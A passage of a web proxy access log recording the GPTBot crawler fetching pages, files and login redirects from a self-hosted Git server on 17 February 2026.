GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/milestones?q=&sort=closestduedate&state=open" -[17/Feb/2026:16:22:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/milestones?sort=closestduedate&state=open" [Client 74.7.227.38] [Length 8505] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/milestones?sort=closestduedate&state=closed" -[17/Feb/2026:16:22:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/milestones?sort=furthestduedate&state=open" [Client 74.7.227.38] [Length 8508] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/milestones?q=&sort=furthestduedate&state=closed" -[17/Feb/2026:16:22:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/milestones?sort=furthestduedate&state=all" [Client 74.7.227.38] [Length 8507] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/milestones?q=&sort=furthestduedate&state=open" -[17/Feb/2026:16:22:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/labels?sort=reversealphabetically&state=" [Client 74.7.227.38] [Length 7661] [Gzip 2.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/labels" -[17/Feb/2026:16:22:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/watchfiles?display=rendered" [Client 74.7.227.38] [Length 10991] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/watchfiles" -[17/Feb/2026:16:22:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/normalizer?display=rendered" [Client 74.7.227.38] [Length 10994] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/normalizer" -[17/Feb/2026:16:22:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/watchfiles?display=rendered" [Client 74.7.227.38] [Length 11023] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/watchfiles" -[17/Feb/2026:16:22:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/websockets?display=rendered" [Client 74.7.227.38] [Length 11026] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/websockets" -[17/Feb/2026:16:22:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" [Client 74.7.227.38] [Length 9967] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" -[17/Feb/2026:16:22:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" [Client 74.7.227.38] [Length 26859] [Gzip 20.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" -[17/Feb/2026:16:22:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" [Client 74.7.227.38] [Length 16698] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" -[17/Feb/2026:16:22:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/websockets?display=rendered" [Client 74.7.227.38] [Length 10995] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/websockets" -[17/Feb/2026:16:22:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/normalizer?display=rendered" [Client 74.7.227.38] [Length 11025] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/normalizer" -[17/Feb/2026:16:22:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/nginx/proxy_host/2.conf?display=rendered" [Client 74.7.227.38] [Length 11018] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/nginx/proxy_host/2.conf" -[17/Feb/2026:16:22:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/nginx/proxy_host/3.conf?display=rendered" [Client 74.7.227.38] [Length 10990] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/nginx/proxy_host/3.conf" -[17/Feb/2026:16:22:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/nginx/proxy_host/1.conf?display=rendered" [Client 74.7.227.38] [Length 11018] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/nginx/proxy_host/1.conf" -[17/Feb/2026:16:22:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/nginx/proxy_host/4.conf?display=rendered" [Client 74.7.227.38] [Length 11018] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/nginx/proxy_host/4.conf" -[17/Feb/2026:16:22:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/src-old/old-transport.hpp" [Client 74.7.227.38] [Length 12299] [Gzip 5.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/src-old/old-transport.hpp" -[17/Feb/2026:16:22:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/src-old/old-transport.hpp" [Client 74.7.227.38] [Length 12301] [Gzip 5.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/src-old/old-transport.hpp" -[17/Feb/2026:16:22:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/src-old/old-transport.hpp" [Client 74.7.227.38] [Length 12299] [Gzip 5.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/src-old/old-transport.hpp" -[17/Feb/2026:16:22:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt?display=rendered" [Client 74.7.227.38] [Length 11057] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:16:22:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt?display=source" [Client 74.7.227.38] [Length 11206] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:16:22:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml?display=rendered" [Client 74.7.227.38] [Length 11068] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:16:22:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt?display=source" [Client 74.7.227.38] [Length 11269] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:16:22:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml?display=source" [Client 74.7.227.38] [Length 21063] [Gzip 6.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:16:22:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt?display=rendered" [Client 74.7.227.38] [Length 11063] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:16:22:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/codec.cpp.o" [Client 74.7.227.38] [Length 11081] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src" -[17/Feb/2026:16:22:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/codec.cpp.o" [Client 74.7.227.38] [Length 11080] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src" -[17/Feb/2026:16:22:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/codec.cpp.o" [Client 74.7.227.38] [Length 11081] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src" -[17/Feb/2026:16:22:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.gitignore?display=rendered" [Client 74.7.227.38] [Length 11090] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.gitignore" -[17/Feb/2026:16:22:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/nginx.conf?display=rendered" [Client 74.7.227.38] [Length 11095] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/nginx.conf" -[17/Feb/2026:16:22:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt-requests_error.log?display=rendered" [Client 74.7.227.38] [Length 10967] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt-requests_error.log" -[17/Feb/2026:16:22:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/branch/main/npm/data/logs/fallback_http_error.log" [Client 74.7.227.38] [Length 25697] [Gzip 11.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/fallback_http_error.log" -[17/Feb/2026:16:22:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/branch/main/npm/data/logs/fallback_http_access.log" [Client 74.7.227.38] [Length 55994] [Gzip 15.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/fallback_http_access.log" -[17/Feb/2026:16:22:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/logs/fallback_error.log" [Client 74.7.227.38] [Length 11608] [Gzip 3.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs" -[17/Feb/2026:16:22:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/logs/fallback_stream_access.log" [Client 74.7.227.38] [Length 11187] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs" -[17/Feb/2026:16:22:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/%20PostgreSQL%20%EC%9E%91%EC%97%85.md" [Client 74.7.227.38] [Length 12165] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument" -[17/Feb/2026:16:22:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/codec.cpp.o" [Client 74.7.227.38] [Length 9993] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/codec.cpp.o" -[17/Feb/2026:16:22:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/codec.cpp.o" [Client 74.7.227.38] [Length 9994] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/codec.cpp.o" -[17/Feb/2026:16:22:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/codec.cpp.o" [Client 74.7.227.38] [Length 9994] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/codec.cpp.o" -[17/Feb/2026:16:22:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/codec.cpp.o" [Client 74.7.227.38] [Length 2064] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/codec.cpp.o" -[17/Feb/2026:16:22:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/codec.cpp.o" [Client 74.7.227.38] [Length 14454] [Gzip 11.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/codec.cpp.o" -[17/Feb/2026:16:22:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/codec.cpp.o" [Client 74.7.227.38] [Length 2064] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/codec.cpp.o" -[17/Feb/2026:16:22:55 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/npm/data/logs/fallback_http_error.log" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/npm/data/logs/fallback_http_error.log" -[17/Feb/2026:16:22:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/npm/data/logs/fallback_http_error.log" -[17/Feb/2026:16:22:55 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/npm/data/logs/fallback_http_access.log" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/npm/data/logs/fallback_http_access.log" -[17/Feb/2026:16:22:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/npm/data/logs/fallback_http_access.log" -[17/Feb/2026:16:22:56 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/npm/data/logs/fallback_error.log" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/fallback_error.log" -[17/Feb/2026:16:22:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/npm/data/logs/fallback_error.log" -[17/Feb/2026:16:22:57 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/npm/data/logs/fallback_error.log" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/fallback_error.log" -[17/Feb/2026:16:22:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/npm/data/logs/fallback_error.log" -[17/Feb/2026:16:22:57 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/npm/data/logs/fallback_stream_access.log" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/fallback_stream_access.log" -[17/Feb/2026:16:22:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 